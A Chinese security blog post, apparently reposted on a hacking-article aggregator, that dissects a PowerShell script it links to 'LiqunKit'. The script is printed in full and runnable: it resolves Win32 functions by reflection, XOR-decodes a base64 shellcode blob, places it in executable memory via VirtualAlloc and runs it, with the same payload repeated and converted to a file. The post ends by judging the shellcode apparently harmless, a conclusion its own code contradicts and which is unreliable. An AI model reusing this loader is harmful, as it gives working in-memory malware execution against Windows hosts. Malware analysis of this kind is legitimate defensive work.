Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDEp5QBUjx9/iM/RfQTsq2sIlbyAsUsdzKnXOKfh0i2AYmS2Aj12vLHf2yS9/4A8GL2TzNAw0E+EoB/4nOckoEJz+zIlIbEOHT+SRbs3bNyN2UEZRDmJERk1XGQNuSkBRTFBMRVcDbXdzA1UDEg0TLikjrhepgZMbF+UJDRwQXLqi4p7f78tuyAXryZs4P2mDoVhhgbs0ry09YC5ZREv3fqM30HrzZeFZ8eFD0azoz56kS203bvSpgqsAld6n1R154+1saO4zJSuyOAwU3xNSVrosBa1u1SiNWeTnsOUPZRyEnDWNRYv3V4uEInXYOf2pXp6pzZMUPU9zNV42Xum1VlthK5ZfwVpLFa77E58AwESkXGFfMI4kXsVWIwciK08CBqENYBbnBauJ2RNQS5FMMmypAsc51l6MXLJ7lLnCWvBS9z/EMyebgxLjXXAHK3FG7W0lUQpjq0KGBbMVlhLkhwP/4YNxWQozvLVV6N4tKMWMoT+YMN+y5PFcguy1MiAjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3FdKTkYNR0JXRg5USk1HTFRQDUBMTiMxF3Vb')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

又见字符串:

38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDEp5QBUjx9/iM/RfQTsq2sIlbyAsUsdzKnXOKfh0i2AYmS2Aj12vLHf2yS9/4A8GL2TzNAw0E+EoB/4nOckoEJz+zIlIbEOHT+SRbs3bNyN2UEZRDmJERk1XGQNuSkBRTFBMRVcDbXdzA1UDEg0TLikjrhepgZMbF+UJDRwQXLqi4p7f78tuyAXryZs4P2mDoVhhgbs0ry09YC5ZREv3fqM30HrzZeFZ8eFD0azoz56kS203bvSpgqsAld6n1R154+1saO4zJSuyOAwU3xNSVrosBa1u1SiNWeTnsOUPZRyEnDWNRYv3V4uEInXYOf2pXp6pzZMUPU9zNV42Xum1VlthK5ZfwVpLFa77E58AwESkXGFfMI4kXsVWIwciK08CBqENYBbnBauJ2RNQS5FMMmypAsc51l6MXLJ7lLnCWvBS9z/EMyebgxLjXXAHK3FG7W0lUQpjq0KGBbMVlhLkhwP/4YNxWQozvLVV6N4tKMWMoT+YMN+y5PFcguy1MiAjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3FdKTkYNR0JXRg5USk1HTFRQDUBMTiMxF3Vb

可在powershell中执行:

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDEp5QBUjx9/iM/RfQTsq2sIlbyAsUsdzKnXOKfh0i2AYmS2Aj12vLHf2yS9/4A8GL2TzNAw0E+EoB/4nOckoEJz+zIlIbEOHT+SRbs3bNyN2UEZRDmJERk1XGQNuSkBRTFBMRVcDbXdzA1UDEg0TLikjrhepgZMbF+UJDRwQXLqi4p7f78tuyAXryZs4P2mDoVhhgbs0ry09YC5ZREv3fqM30HrzZeFZ8eFD0azoz56kS203bvSpgqsAld6n1R154+1saO4zJSuyOAwU3xNSVrosBa1u1SiNWeTnsOUPZRyEnDWNRYv3V4uEInXYOf2pXp6pzZMUPU9zNV42Xum1VlthK5ZfwVpLFa77E58AwESkXGFfMI4kXsVWIwciK08CBqENYBbnBauJ2RNQS5FMMmypAsc51l6MXLJ7lLnCWvBS9z/EMyebgxLjXXAHK3FG7W0lUQpjq0KGBbMVlhLkhwP/4YNxWQozvLVV6N4tKMWMoT+YMN+y5PFcguy1MiAjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3FdKTkYNR0JXRg5USk1HTFRQDUBMTiMxF3Vb')

将数字16进制转换:

content = "223 203 170 35 35 35 67 170 198 18 241 71 168 113 19 168 113 47 168 113 55 168 81 11 44 148 105 5 18 220 18 227 143 31 66 95 33 15 3 226 236 46 34 228 193 211 113 116 168 113 51 168 97 31 34 243 168 99 91 166 227 87 105 34 243 115 168 107 59 168 123 3 34 240 192 31 106 168 23 168 34 245 18 220 18 227 143 226 236 46 34 228 27 195 86 215 32 94 219 24 94 7 86 193 123 168 123 7 34 240 69 168 47 104 168 123 63 34 240 168 39 168 34 243 170 103 7 7 120 120 66 122 121 114 220 195 123 124 121 168 49 200 165 126 75 77 70 87 35 75 84 74 77 74 119 75 111 84 5 36 220 246 203 35 35 35 35 18 220 116 116 116 116 116 75 25 117 90 132 220 246 202 135 35 35 35 120 18 234 114 114 73 32 114 114 75 152 34 35 35 112 115 75 116 170 188 229 220 246 115 202 175 35 35 35 120 18 241 113 75 35 17 227 167 113 113 113 112 113 115 75 200 118 13 24 220 246 170 229 160 224 115 75 163 16 35 35 170 195 73 39 115 73 60 117 75 86 101 189 165 220 246 124 18 220 116 116 73 220 112 117 75 14 37 59 88 220 246 166 227 44 167 233 34 35 35 18 220 166 213 87 39 170 218 200 42 75 137 230 193 126 220 246 170 226 75 102 2 125 18 220 246 18 220 116 73 36 114 117 115 75 148 116 195 40 220 246 156 35 12 35 35 26 228 86 36 123 115 202 88 220 220 220 18 220 202 178 34 35 35 202 234 34 35 35 203 76 220 220 220 12 74 121 64 21 35 199 223 226 51 244 95 65 59 42 218 194 37 111 32 44 82 199 115 42 117 206 41 248 116 139 96 24 153 45 128 143 93 175 44 119 246 201 47 127 224 15 6 47 100 243 52 12 52 19 225 40 7 254 39 57 201 40 16 156 254 204 137 72 108 67 135 79 228 145 110 205 219 55 35 118 80 70 81 14 98 68 70 77 87 25 3 110 74 64 81 76 80 76 69 87 3 109 119 115 3 85 3 18 13 19 46 41 35 174 23 169 129 147 27 23 229 9 13 28 16 92 186 162 226 158 223 239 203 110 200 5 235 201 155 56 63 105 131 161 88 97 129 187 52 175 45 61 96 46 89 68 75 247 126 163 55 208 122 243 101 225 89 241 225 67 209 172 232 207 158 164 75 109 55 110 244 169 130 171 0 149 222 167 213 29 121 227 237 108 104 238 51 37 43 178 56 12 20 223 19 82 86 186 44 5 173 110 213 40 141 89 228 231 176 229 15 101 28 132 156 53 141 69 139 247 87 139 132 34 117 216 57 253 169 94 158 169 205 147 20 61 79 115 53 94 54 94 233 181 86 91 97 43 150 95 193 90 75 21 174 251 19 159 0 192 68 164 92 97 95 48 142 36 94 197 86 35 7 34 43 79 2 6 161 13 96 22 231 5 171 137 217 19 80 75 145 76 50 108 169 2 199 57 214 94 140 92 178 123 148 185 194 90 240 82 247 63 196 51 39 155 131 18 227 93 112 7 43 113 70 237 109 37 81 10 99 171 66 134 5 179 21 150 18 228 135 3 255 225 131 113 89 10 51 188 181 85 232 222 45 40 197 140 161 63 152 48 223 178 228 241 92 130 236 181 50 32 35 75 211 150 129 117 220 246 73 99 75 35 51 35 35 75 35 35 99 35 116 75 123 135 112 198 220 246 176 154 35 35 35 35 34 250 114 112 170 196 116 75 35 3 35 35 112 117 75 49 181 170 193 220 246 166 227 87 229 168 36 34 224 166 227 86 198 123 224 203 170 222 220 220 87 74 78 70 13 71 66 87 70 14 84 74 77 71 76 84 80 13 64 76 78 35 49 23 117 91"


hex_arrays = content.split(' ')
# hex_bytes = bytes.fromhex(content)
print(hex_arrays)
pe_list = []
# int_arrs = list(map(int, hex_arrays))
for hex_array in range(len(hex_arrays)):
    int_array = '0x%02x' % (int(hex_arrays[hex_array], 10))
    pe_list.append(int_array)


pe_str = "".join(pe_list).replace("0x", "")
content = binascii.a2b_hex(pe_str)
with open("ps_shellcode", 'wb') as pe_file:
    pe_file.write(content)

生成shellcode:

在使用恶意代码分析利器scdbg.exe进行分析,虽然看不太懂,不过依样画葫芦,感觉未有啥恶意痕迹:

 

一乐:

 


 


知识来源: https://vulsee.com/archives/vulsee_2021/1130_15727.html
想收藏或者和大家分享这篇好文章→复制链接地址

“powershell 解码分析の测试(LiqunKit?) – vulsee.com”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求投资、赞助、支持💖

标签云